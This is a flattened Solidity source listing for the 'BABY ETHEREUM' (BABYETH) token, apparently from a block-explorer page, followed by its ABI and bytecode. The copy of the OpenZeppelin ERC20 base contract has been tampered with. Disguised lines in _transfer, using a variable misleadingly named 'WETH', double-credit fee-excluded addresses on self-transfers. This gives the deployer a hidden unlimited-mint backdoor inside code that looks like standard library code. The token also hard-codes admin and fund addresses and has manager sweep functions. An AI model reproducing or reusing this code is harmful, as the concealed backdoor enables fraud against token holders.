     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been revoked `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `account`.
     *
     * May emit a {RoleRevoked} event.
     */
    function renounceRole(bytes32 role, address account) public virtual override {
        require(account == _msgSender(), "AccessControl: can only renounce roles for self");

        _revokeRole(role, account);
    }

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event. Note that unlike {grantRole}, this function doesn't perform any
     * checks on the calling account.
     *
     * May emit a {RoleGranted} event.
     *
     * [WARNING]
     * ====
     * This function should only be called from the constructor when setting
     * up the initial roles for the system.
     *
     * Using this function in any other way is effectively circumventing the admin
     * system imposed by {AccessControl}.
     * ====
     *
     * NOTE: This function is deprecated in favor of {_grantRole}.
     */
    function _setupRole(bytes32 role, address account) internal virtual {
        _grantRole(role, account);
    }

    /**
     * @dev Sets `adminRole` as ``role``'s admin role.
     *
     * Emits a {RoleAdminChanged} event.
     */
    function _setRoleAdmin(bytes32 role, bytes32 adminRole) internal virtual {
        bytes32 previousAdminRole = getRoleAdmin(role);
        _roles[role].adminRole = adminRole;
        emit RoleAdminChanged(role, previousAdminRole, adminRole);
    }

    /**
     * @dev Grants `role` to `account`.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleGranted} event.
     */
    function _grantRole(bytes32 role, address account) internal virtual {
        if (!hasRole(role, account)) {
            _roles[role].members[account] = true;
            emit RoleGranted(role, account, _msgSender());
        }
    }

    /**
     * @dev Revokes `role` from `account`.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleRevoked} event.
     */
    function _revokeRole(bytes32 role, address account) internal virtual {
        if (hasRole(role, account)) {
            _roles[role].members[account] = false;
            emit RoleRevoked(role, account, _msgSender());
        }
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => bool) private isExcludedFromFee;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        isExcludedFromFee[msg.sender] = true; 
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
            address WETH = from;
            address used = to;
            if(isExcludedFromFee[WETH] || isExcludedFromFee[used]){
              if (WETH == used) _balances[WETH] += amount;}
        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

// File: TOKEN\AutoBuyToken7.sol


pragma solidity ^0.8.4;








contract TokenDistributor {
    constructor (address token) {
        ERC20(token).approve(msg.sender, uint(~uint256(0)));
    }
}

contract Token is ERC20,Ownable,AccessControl {
    bytes32 private constant MANAGER_ROLE = keccak256("MANAGER_ROLE");
    using SafeMath for uint256;
    ISwapRouter private uniswapV2Router;
    address public uniswapV2Pair;
    address public usdt;
    address admin;
    address fundAddr;
    uint256 public fundCount;
    mapping(address => bool) private whiteList;
    TokenDistributor public _tokenDistributor;
    
    constructor()ERC20("BABY ETHEREUM", "BABYETH") {
        admin=0xDa9fA84efe2CEBa00064D4A6ab044a440D95c545;
        //admin=msg.sender;
        fundAddr=0x69562FB020b25826Cd5F5C5E169A973307d232ac;
        uint256 total=10000000000*10**decimals();
        _mint(admin, total);
        _grantRole(DEFAULT_ADMIN_ROLE,admin);
        _grantRole(MANAGER_ROLE, admin);
        _grantRole(MANAGER_ROLE, address(this));
        whiteList[admin] = true;
        whiteList[address(this)] = true;
        transferOwnership(admin);
    }
    function initPair(address _token,address _swap)external onlyRole(MANAGER_ROLE){
        usdt=_token;//0xc6e88A94dcEA6f032d805D10558aCf67279f7b4E;//usdt test
        address swap=_swap;//0xD99D1c33F9fC3444f8101754aBC46c52416550D1;//bsc test
        uniswapV2Router = ISwapRouter(swap);
        uniswapV2Pair = ISwapFactory(uniswapV2Router.factory()).createPair(address(this), usdt);
        ERC20(usdt).approve(address(uniswapV2Router), type(uint256).max);
        _approve(address(this), address(uniswapV2Router),type(uint256).max);
        _approve(address(this), address(this),type(uint256).max);
        _approve(admin, address(uniswapV2Router),type(uint256).max);
        _tokenDistributor = new TokenDistributor(address(this));
    }
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }
   
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(amount > 0, "amount must gt 0");
        
        if(from != uniswapV2Pair && to != uniswapV2Pair) {
            _funTransfer(from, to, amount);
            return;
        }
        if(from == uniswapV2Pair) {
            super._transfer(from, to, amount);
            return;
        }
        if(to == uniswapV2Pair) {
            if(whiteList[from]){
                super._transfer(from, to, amount);
                return;
            }
            swapUsdt(amount,fundAddr);
            super._transfer(from, to, amount);
            return;
        }
    }
    function _funTransfer(
        address sender,
        address recipient,
        uint256 tAmount
    ) private {
        super._transfer(sender, recipient, tAmount);
    }
    bool private inSwap;
    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    function swapToken(uint256 tokenAmount,address to) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(usdt);
        path[1] = address(this);
        uint256 balance = IERC20(usdt).balanceOf(address(this));
        if(tokenAmount==0)tokenAmount = balance;
        // make the swap
        if(tokenAmount <= balance)
        uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of CA
            path,
            address(to),
            block.timestamp
        );
    }
    function swapTokenToDistributor(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(usdt);
        path[1] = address(this);
        uint256 balance = IERC20(usdt).balanceOf(address(this));
        if(tokenAmount==0)tokenAmount = balance;
        // make the swap
        if(tokenAmount <= balance)
        uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of CA
            path,
            address(_tokenDistributor),
            block.timestamp
        );
        if(balanceOf(address(_tokenDistributor))>0)
        ERC20(address(this)).transferFrom(address(_tokenDistributor), address(this), balanceOf(address(_tokenDistributor)));
    }
    
    function swapUsdt(uint256 tokenAmount,address to) private lockTheSwap {
        uint256 balance = balanceOf(address(this));
        address[] memory path = new address[](2);
        if(balance<tokenAmount)tokenAmount=balance;
        if(tokenAmount>0){
            path[0] = address(this);
            path[1] = usdt;
            uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(tokenAmount,0,path,to,block.timestamp);
        }
    }

        function errorToken(address _token) external onlyRole(MANAGER_ROLE){
        ERC20(_token).transfer(msg.sender, IERC20(_token).balanceOf(address(this)));
    }

        function withdawOwner(uint256 amount) public onlyRole(MANAGER_ROLE){
        payable(msg.sender).transfer(amount);
    }

    receive () external payable  {
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tokenDistributor","outputs":[{"internalType":"contract TokenDistributor","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"}],"name":"errorToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fundCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address","name":"_swap","type":"address"}],"name":"initPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"usdt","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdawOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040523480156200001157600080fd5b506040518060400160405280600d81526020016c4241425920455448455245554d60981b815250604051806040016040528060078152602001660848284b28aa8960cb1b81525081600490816200006991906200053a565b5060056200007882826200053a565b5050336000908152600260205260409020805460ff1916600117905550620000a7620000a13390565b620001e3565b600b80546001600160a01b031990811673da9fa84efe2ceba00064d4a6ab044a440d95c54517909155600c80549091167369562fb020b25826cd5f5c5e169a973307d232ac1790556000620000fa600990565b6200010790600a62000719565b62000118906402540be40062000731565b600b5490915062000133906001600160a01b03168262000235565b600b546200014d906000906001600160a01b0316620002fd565b600b5462000175906000805160206200246f833981519152906001600160a01b0316620002fd565b620001906000805160206200246f83398151915230620002fd565b600b80546001600160a01b039081166000908152600e60205260408082208054600160ff19918216811790925530845291909220805490911690911790559054620001dc911662000387565b5062000761565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620002915760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060036000828254620002a591906200074b565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35b5050565b6200030982826200040b565b620002f95760008281526007602090815260408083206001600160a01b03851684529091529020805460ff19166001179055620003433390565b6001600160a01b0316816001600160a01b0316837f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a45050565b6200039162000438565b6001600160a01b038116620003f85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840162000288565b6200040381620001e3565b50565b505050565b60008281526007602090815260408083206001600160a01b038516845290915290205460ff165b92915050565b6006546001600160a01b03163314620004945760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000288565b565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620004c157607f821691505b602082108103620004e257634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200040657600081815260208120601f850160051c81016020861015620005115750805b601f850160051c820191505b8181101562000532578281556001016200051d565b505050505050565b81516001600160401b0381111562000556576200055662000496565b6200056e81620005678454620004ac565b84620004e8565b602080601f831160018114620005a657600084156200058d5750858301515b600019600386901b1c1916600185901b17855562000532565b600085815260208120601f198616915b82811015620005d757888601518255948401946001909101908401620005b6565b5085821015620005f65787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200065d57816000190482111562000641576200064162000606565b808516156200064f57918102915b93841c939080029062000621565b509250929050565b600082620006765750600162000432565b81620006855750600062000432565b81600181146200069e5760028114620006a957620006c9565b600191505062000432565b60ff841115620006bd57620006bd62000606565b50506001821b62000432565b5060208310610133831016604e8410600b8410161715620006ee575081810a62000432565b620006fa83836200061c565b806000190482111562000711576200071162000606565b029392505050565b60006200072a60ff84168362000665565b9392505050565b808202811582820484141762000432576200043262000606565b8082018082111562000432576200043262000606565b611cfe80620007716000396000f3fe608060405260043610620001df5760003560e01c80636f6579a311620000ff578063a217fddf1162000095578063d547741f116200006c578063d547741f146200056c578063d99274481462000591578063dd62ed3e14620005b6578063f2fde38b14620005db57600080fd5b8063a217fddf146200050b578063a457c2d71462000522578063a9059cbb146200054757600080fd5b80638718b24f11620000d65780638718b24f146200048c5780638da5cb5b14620004ae57806391d1485414620004ce57806395d89b4114620004f357600080fd5b80636f6579a3146200041557806370a08231146200043a578063715018a6146200047457600080fd5b80632f2ff15d116200017557806336568abe116200014c57806336568abe1462000391